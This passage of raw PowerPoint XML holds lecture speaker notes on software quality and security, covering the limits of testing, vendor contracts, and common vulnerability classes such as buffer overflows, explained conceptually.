          <p:cNvPr id="1280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8003" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> is an integral part of software development, but it represents only one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>four Ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> that need to be taken into account. The others – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>People, Project, and Product </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>– must also be considered. What are the skill levels of the people responsible for the software design and architecture and can they rise to the task at hand? Are project goals and risks understood and is there a procedure in place for measuring progress and proactively identifying and correcting problems? Even if you follow the best processes in the world, a single mistake related to the people (an incorrect line of code) or the project (problems that were identified but never corrected) can compromise the entire process, as well as the final product. Ex: When you travel by air, you don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>t fly on a process, you fly on a plane. While you hope that skilled people used a proven process in approaching the plane-building project, ultimately it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s the plane itself that must take off and land safely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Most software applications come with a purchase contract that severely restricts your ability to recover damages from the manufacturer in the event that the application fails or contains flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. The Uniform Computer Information Transaction Act (UCITA) allows software manufacturers to include clauses in their purchase contracts that prohibit buyers from canceling the contract or demanding a refund in the event that the product does not function properly. The law also restricts your company from publicly discussing or criticizing the flawed software. Therefore, you cannot rely on software manufacturers to stand behind, or build quality into, their products. Currently, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>time to market</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> is the focus, not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>good</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> software. Therefore, the ultimate responsibility for ensuring the reliability, security, and availability of the software your company purchases falls on your shoulders alone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>6. The theory: if you pass a standardized test, you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>qualified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> to write good software. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A software professional needs to understand more than just the syntax of the language being used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. She must know about operating systems, compilers, object-oriented design, etc. You must know what to look for in getting a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>good</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> software developer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2254394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0977C301-5E6F-084F-B6BB-B26326290758}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372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7219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>While automated testing can be an important tool in creating software that works, the reality is that relying on automated testing as a quality assurance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>silver bullet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> is a mistake waiting to happen. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>If you automate bad tests, all you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>re doing is running bad tests faster. And fast, bad tests will often not detect critical defects or bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. Software tests must be strategically planned and validated prior to automation with well-defined measures and goals in place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s what software vendors want you to believe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. They want you to lower your expectations by making you think it is overly complex, and is thus bound to malfunction periodically. Ex: Cars are complex but you would not accept a car that only starts 18 out of 20 times or stalls every few days.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Advances in programming languages have lead to greater software complexity, making it more difficult to achieve acceptable levels of security and reliability.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Advanced software features can create additional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> at which bugs and glitches may be misdiagnosed or overlooked completely. Advances in programming languages often outpace testing tools and techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Most computer / network security does not take the insider into account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. Security risks in a wireless network arise when unauthorized parties are able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> physical and virtual security elements or make those elements believe that they are authorized parties. True software security is more than locked doors, firewalls, and cryptography. Software security is making sure that your applications do what they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>re supposed to do, even under attack. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31533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242FD7D6-5D46-FC46-8564-2EB1E85D7E69}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160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0771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Buffer overflows. These occur when a programmer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>does not properly check whether there is adequate space to hold data entered by a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. An intruder can exploit this vulnerability by intentionally entering excess data, which interrupts the program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s normal operations and allows the intruder to take control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Timing windows. Problems with timing occur when a temporary file is exploited by an intruder to gain access to a file, overwrite important data, and use the file as a gateway for advancing further into the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Insecure default configurations. These occur when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>vendors use known default passwords to make it as easy as possible for consumers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>to set up new systems. Unfortunately, most intruders know these passwords and can access systems effortlessly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Bad protocols. Some protocols, or the standards by which information is exchanged over the Internet, lack any security at all. For example, unsolicited commercial email, commonly referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>, is the irritating result of poor protocol programming.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Trusting untrustworthy information. This is usually a problem that affects routers, or those computers that connect one network to another. When routers are not programmed to verify that they are receiving information from a unique host, bogus routers can gain access to systems and do damage.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424493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486B9852-AB68-6E40-845C-A7C83BC06344}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Buffer overflow exploits are one of the most serious information security problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. A buffer overflow essentially takes advantage of applications that do not adequately parse input by stuffing too much data into undersized receptacles. Depending on the environment, the resulting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> of code typically has unfettered capacity to execute whatever arbitrary functions a programmer might wish. Programs that do not perform proper bounds checking are common, and buffer overflow exploits are well-known across most Unix and NT platforms. A large number of exploits floating around the net take advantage of a buffer overflow in one form or another.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51280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912FC438-EF14-C945-B813-2311878DA1AE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163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843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>This code is a very simple example of a buffer overflow attack. We set up a buffer that can contain 256 characters, but then, because we do not do the proper bounds checking we insert 512 characters into the character buffer we set up, which overflows the buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Bounds checking should be added to this program.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120298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2338">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="922338">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
